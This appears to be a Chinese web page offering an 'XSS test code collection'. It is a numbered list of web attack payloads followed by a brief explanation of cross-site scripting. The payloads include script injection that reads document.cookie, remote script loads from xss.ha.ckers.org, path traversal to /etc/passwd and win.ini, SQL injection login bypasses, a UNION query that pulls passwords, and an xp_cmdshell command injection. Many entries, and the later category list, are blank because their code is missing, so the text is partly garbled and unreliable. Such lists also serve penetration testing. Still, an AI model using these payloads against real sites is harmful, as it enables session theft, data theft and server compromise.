XSS跨站测试代码大全

1. '>  
2. ='>  
3.   
4.   
5. %3Cscript%3Ealert('XSS')%3C/script%3E  
6.   
7.   
8. %0a%0a.jsp  
9. %22%3cscript%3ealert(%22xss%22)%3c/script%3e  
10. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
11. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
12. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
13. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
14. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
15. %3f.jsp  
16. %3f.jsp  
17.   
18.   
19. ?sql_debug=1  
20. a%5c.aspx  
21. a.jsp/  
22. a/  
23. a?  
24. ">  
25. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
26. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
27. %3Cscript%3Ealert(document. domain);%3C/script%3E&  
28. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
29. 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
30. http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
31. ..\..\..\..\..\..\..\..\windows\system.ini  
32. \..\..\..\..\..\..\..\..\windows\system.ini  
33. '';!--"=&{()}  
34.   
35.   
36.   
37.   
38.   
39.   
40.   
41.   
42.   
43.   
44. "";' > out  
45.   
46.   
47.   
48.   
49.   
50.   
51.   
52.   
53.   
54.   
55.   
56.   
57.   
58.   
59.   
60.   
61.   
62.   
63.   
64.   
65.   
66.   
67. alert('XSS');  
68. .XSS{background-image:url("javascript:alert('XSS')");}  
69. BODY{background:url("javascript:alert('XSS')")}  
70.   
71. getURL("javascript:alert('XSS')")  
72. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
73.   
74. "> <"  
75.   
77.   
78.   
79. " src="http://xss.ha.ckers.org/a.js">  
80. " src="http://xss.ha.ckers.org/a.js">  
81. " '' src="http://xss.ha.ckers.org/a.js">  
82. '" src="http://xss.ha.ckers.org/a.js">  
83. PT src="http://xss.ha.ckers.org/a.js">  
84. link  
85. admin'--  
86. ' or 0=0 --  
87. " or 0=0 --  
88. or 0=0 --  
89. ' or 0=0 #  
90. " or 0=0 #  
91. or 0=0 #  
92. ' or 'x'='x  
93. " or "x"="x  
94. ') or ('x'='x  
95. ' or 1=1--  
96. " or 1=1--  
97. or 1=1--  
98. ' or a=a--  
99. " or "a"="a  
100. ') or ('a'='a  
101. ") or ("a"="a  
102. hi" or "a"="a  
103. hi" or 1=1 --  
104. hi' or 1=1 --  
105. hi' or 'a'='a  
106. hi') or ('a'='a  
107. hi") or ("a"="a
108. 
     

XSS攻击：跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被骇客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击，黑客界共识是：跨站脚本攻击是新型的“缓冲区溢出攻击“，而JavaScript是新型的“ShellCode”。

下面是几种常用的XSS攻击代码：

(1)普通的XSS JavaScript注入

(2)IMG标签XSS使用JavaScript命令

(3)IMG标签无分号无引号

(4)IMG标签大小写不敏感

(5)HTML编码(必须有分号)

(6)修正缺陷IMG标签
”>

(7)formCharCode标签(计算器)

(8)UTF-8的Unicode编码(计算器)

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

(10)十六进制编码也是没有分号(计算器)

(11)嵌入式标签,将Javascript分开

(12)嵌入式编码标签,将Javascript分开

(13)嵌入式换行符

(14)嵌入式回车

(15)嵌入式多行注入JavaScript,这是XSS极端的例子

(16)解决限制字符(要求同页面)